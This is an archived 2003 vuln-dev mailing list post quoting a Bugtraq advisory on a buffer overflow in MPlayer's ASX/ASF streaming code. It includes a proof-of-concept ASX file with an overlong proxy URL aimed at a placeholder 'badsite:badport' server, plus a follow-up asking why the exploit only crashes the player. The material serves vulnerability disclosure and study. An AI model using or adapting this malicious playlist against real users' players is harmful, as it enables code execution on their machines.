MPlayer buffer overflow
From: Peter Geissler (blasty_at_geekz.nl)
Date: 09/29/03
- Previous message: Lorenzo Hernandez Garcia-Hierro: "Possible Apache directory rules bypass / override"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 29 Sep 2003 21:47:44 +0200 To: vuln-dev@securityfocus.com
In-Reply-To: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8@USPLM250.txpln.us.eds.com>
>
> I tried to exploit this bug, But I didn't succeed.
> The only thing happens is mplayer crashes, so I did a hookup with GDB, and saw it crashed on strcasecmp with eip 0x40315fe0 and not something like 0x41414141 ;)
> In the PoC exploit on bugtraq the "aaaa..." buffer is not correctly formatted (newlines must be removed so it's one long string..), but I already fixed that.
> Has anyone an idea what I'm doing wrong?
>> >Received: (qmail 27128 invoked from network); 26 Sep 2003 19:54:43 -0000
>> >Received: from outgoing3.securityfocus.com (205.206.231.27)
>> > by mail.securityfocus.com with SMTP; 26 Sep 2003 19:54:43 -0000
>> >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
>> > by outgoing3.securityfocus.com (Postfix) with QMQP
>> > id 29059A3563; Fri, 26 Sep 2003 11:15:06 -0600 (MDT)
>> >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>> >Precedence: bulk
>> >List-Id: <bugtraq.list-id.securityfocus.com>
>> >List-Post: <mailto:bugtraq@securityfocus.com>
>> >List-Help: <mailto:bugtraq-help@securityfocus.com>
>> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>> >List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>> >Delivered-To: mailing list bugtraq@securityfocus.com
>> >Delivered-To: moderator for bugtraq@securityfocus.com
>> >Received: (qmail 1413 invoked from network); 25 Sep 2003 18:13:00 -0000
>> >Message-ID: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8@USPLM250.txpln.us.eds.com>
>> >From: "Otero, Hernan" <hernan.otero@eds.com>
>> >To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
>> >Subject: Mplayer Buffer Overflow
>> >Date: Thu, 25 Sep 2003 19:17:49 -0500
>> >MIME-Version: 1.0
>> >X-Mailer: Internet Mail Service (5.5.2656.59)
>> >Content-Type: text/plain;
>> > charset="ISO-8859-1"
>> >Content-Transfer-Encoding: quoted-printable
>> >
>> >
>> >Favorite Linux Player Buffer Overflow
>> >
>> >
>> > Product: Mplayer
>> > Developers: http://www.mplayerhq.hu
>> > OS: Port to All *NIX and Win32
>> > Remote Exploitable: YES
>> >
>> >Developers has been contacted, problem was fixed, recomended update
>> >your
>> >mplayer version.
>> >
>> > In the source tree there is a file called asf_streaming.c this file
>> >has a
>> >function named asf_http_request, that function has two buffer
>> >overflows,
>> >this overflows are in the sprintf lines.
>> >
>> >
>> > asf_http_request {
>> > char str[250];
>> > ....
>> > ...
>> > ..
>> > sprintf( str, "Host: %s:%d", server_url->hostname,
>> > server_url->port );
>> > ....
>> > ...
>> > ..
>> > sprintf( str, "Host: %s:%d", url->hostname, url->port );
>> >
>> > ....
>> > ...
>> > ..
>> > }
>> >
>> >
>> >
>> > This, at a first look, may look as it can=B4t be exploited ( because
>> >the
>> >MAXHOSTLEN size restriction )... but if in an ASX file like this with a
>> >"badsite" listening in "badport" send "\n\n" as answer you could lead
>> >to a
>> >fully controllable EIP buffer overflow
>> >
>> >
>> > <asx version =3D "3.0">
>> > <title>Bas Site ASX</title>
>> >
>> > <moreinfo href =3D "mailto:info@badsite.com
>> > <mailto:info@badsite.com> " />
>> > <logo href =3D "http://www.badsite.com/streaming/grupo.gif
>> > <http://www.badsite.com/streaming/grupo.gif> " style=3D"ICON" />
>> > <banner href=3D "images/bannermitre.gif">
>> > <abstract>Bad Site live</abstract>
>> > <moreinfo target=3D"_blank" href =3D "http://www.badsite.com/
>> > <http://www.badsite.com/> " />
>> > </banner>
>> >
>> > <entry>
>> > <title>NEWS</title>
>> > <AUTHOR>NEWS</AUTHOR>
>> > <COPYRIGHT>=A9 All by the news</COPYRIGHT>
>> > <ref href
>> >"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
>> >aaaa
>> >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
>> >aaaa
>> >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
>> >aaaa
>> >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
>> >aaaa
>> >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
>> >aaaa
>> >aaaaaaaaaaaa"/>
>> > <logo href =3D "http://www.badsite.com/streaming/grupo.gif
>> > <http://badsite.com/streaming/grupo.gif> " style=3D"ICON" />
>> > </entry>
>> > </asx>
>> >
>> >
>> >
>> > Regards,
>> >
>> > Hern=E1n Otero
>> > hernan.otero@eds.com
>
- Previous message: Lorenzo Hernandez Garcia-Hierro: "Possible Apache directory rules bypass / override"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
